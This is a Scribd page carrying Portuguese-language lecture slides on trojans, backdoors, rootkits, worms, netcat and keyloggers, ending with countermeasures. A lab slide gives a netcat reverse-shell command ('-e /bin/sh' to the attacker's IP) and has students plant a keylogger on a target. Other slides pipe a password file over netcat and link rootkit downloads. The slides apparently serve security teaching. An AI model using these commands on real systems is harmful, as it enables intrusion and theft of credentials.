Scribd Logo
Unggah

Selamat datang di Scribd!

  • Aula10 PDF

    Diunggah oleh

    Danilo
    3 tayangan18 halaman

    Judul Asli

    Aula10.pdf

    Hak Cipta

    © © All Rights Reserved

    Format Tersedia

    PDF, TXT atau baca online dari Scribd

    Apakah menurut Anda dokumen ini bermanfaat?

    Apakah konten ini tidak pantas?

    Laporkan Dokumen Ini

    Hak Cipta:

    © All Rights Reserved
    Unduh sebagai PDF, TXT atau baca online dari Scribd
    Tandai sebagai konten tidak pantas
    3 tayangan18 halaman

    Aula10 PDF

    Diunggah oleh

    Danilo

    Hak Cipta:

    © All Rights Reserved
    Unduh sebagai PDF, TXT atau baca online dari Scribd
    Tandai sebagai konten tidak pantas
    dari 18

    Trojans, Backdoors, Vrus, Rootkits e

    Worms

    Objetivos
    Entender a diferena entre vrus e worms
    Entender o funcionamento das backdoors
    Entender as funcionalidades do trojan
    Entender o conceito de rootkit

    Backdoor
    As backdoors so programas destinados a
    fornecer um meio de acesso remoto ao hacker a
    uma mquina que provavelmente teve sua
    segurana comprometida por ele anteriormente.
    Non-listen backdoor

    Trojan Horse
    Vitria dos gregos sobre Tria;
    Definio: um programa que se mascara
    de algo, enganando a segurana/usurio;
    Podem vir em jogos, serem enviados por
    outra pessoa juntamente com um
    programa, protees de tela, arquivos
    office, etc.
    Ser executado com os privilgios do
    usurio que est executando o arquivo

    Trojan Horse
    Arquivos binrios com cavalo de tria:
    Podem esconder processos (ps, top);
    Podem esconder arquivos (ls, slocate,find);
    Podem esconder estados de conexes de
    rede (netstat, tcpdump);

    Cdigo-fonte com cavalos de tria:


    Programa alterado para prover uma brecha
    de segurana quando executado;
    Exemplo: cliente do TFN2K

    Rootkits
    Definio: conjunto de ferramentas que
    tem como objetivo ofuscar
    determinadas ocorrncias do sistema
    em que se encontra;
    Normalmente constitudo por trojans e
    backdoors;

    Principais tipos de rootkits


    User-land;
    Kernel-land;

    User-land Rootkit
    Os binrios originais so alterados por binrios
    modificados, alterando o fluxo normal do
    programa;
    Primeiramente executado o cdigo do rootkit e
    s ento realizada a funcionalidade real do
    programa;
    Exemplo: Backdoor http://www.packetstormsecurity.org/UNIX/penetration/
    rootkits/backdoor.tar.gz

    Kernel-Land Rootkits
    Adiciona cdigo malicioso no kernel
    atravs de LKM (Loadable Kernel Module),
    drivers, insero de cdigo direto na
    memria, hook de syscall table;
    Se bem implementado, praticamente
    impossvel de ser detectado com o SO em
    execuo, precisando fazer anlise da
    imagem.

    Kernel-Land Rootkits
    Hide Itself: O mdulo se oculta, no
    aparecendo na listagem de mdulos,
    tornando assim impossvel de
    descarreg-lo;
    File Hider: Todos os arquivos que
    possuir uma certa palavra em seu
    nome sero ocultos da vizualizao;

    Kernel-Land Rootkits
    Process Hider: Todos os processos que possuir uma
    certa palavra em seu nome sero ocultos da
    vizualizao;
    Socket Backdoor: Se um pacote com um tamanho
    predefinido contendo uma string especificada no
    rootkit for recebido, ser iniciar um programa,
    normalmente uma backdoor.
    Exemplo: Adore Rootkit http://www.packetstormsecurity.org/groups/teso/adore0.42.tgz

    Vrus e Worm
    Vrus e worms podem ser usados para infectar
    e modificar um sistema a fim de permitir que
    um atacante ganhe acesso ao mesmo. Muitos
    vrus e worms carregam trojans e backdoors.
    Um vrus e um worm so softwares malicioso
    (malware)
    Vrus precisa ser executado para infectar um
    sistema

    Netcat
    Conhecido como canivete suo dos
    administradores de rede.
    Possui inmeras funes, dentre as quais:
    Varredura de portas;
    Banner grabbing;
    Criao de backdoor;
    Tunelamento e etc.

    Alm de facilitar a vida do administrador de rede,


    tambm facilita a vida de um invasor, portanto,
    cuidado! Mate seu processo e remova o binrio
    sempre aps a utilizao, caso no queira tornarse a vtima.

    Netcat - Utilizao
    Transferncia de arquivos:
    No servidor:
    # netcat -l -p 5050 > pass.txt
    No cliente:
    # cat pass.txt | netcat ip_server 5050
    Uso como scanner
    # nc -vv 127.0.0.1 22-25

    Encadeando netcats
    Enviar um arquivo de log de um host para outro
    atravs de um intermedirio:
    host3# ncat -l > log.txt
    host2# ncat -l --sh-exec "ncat host3"
    host1# ncat --send-only host2 < log.txt
    O exemplo a seguir direciona a porta 8080 para o
    servidor web exemplo.org.br:
    # ncat -l localhost 8080 --sh-exec "ncat
    exemplo.org.br 80"

    Keylogger
    Keylogger so programas utilizados para
    gravar tudo aquilo que o usurio digita no
    teclado. Alguns, mais avanados, armazenam
    screenshots da tela ou at mesmo a rea ao
    redor do ponteiro do mouse onde ocorre um
    click.
    Exemplos de Keyloggers:
    Ardamax Windows
    Pykeylogger Linux
    (http://sourceforge.net/projects/pykeylogger/files/ )

    Laboratrio
    Vamos criar uma backdoor e acessar a
    mquina alvo atravs dela.
    Na mquina do atacante execute:
    #nc -l -p 4000
    Na mquina da vtima execute:
    #nc ip_do_atacante 4000 -e /bin/sh
    Copiar o pykeylogger para a mquina
    alvo e execut-lo.

    Contramedidas
    Monitorar constantemente os servios executados
    na mquina e as portas abertas.
    Realizar varreduras constantes utilizando
    ferramentas especficas, como o Unhide, chkrootkit
    e o Security Auditor's Research Assistant (SARA),
    por exemplo.
    Evitar realizar a maioria das tarefas como root, j
    que para a infeco e alastramento, a maioria dos
    malwares precisam de privilgios de root.

    Anda mungkin juga menyukai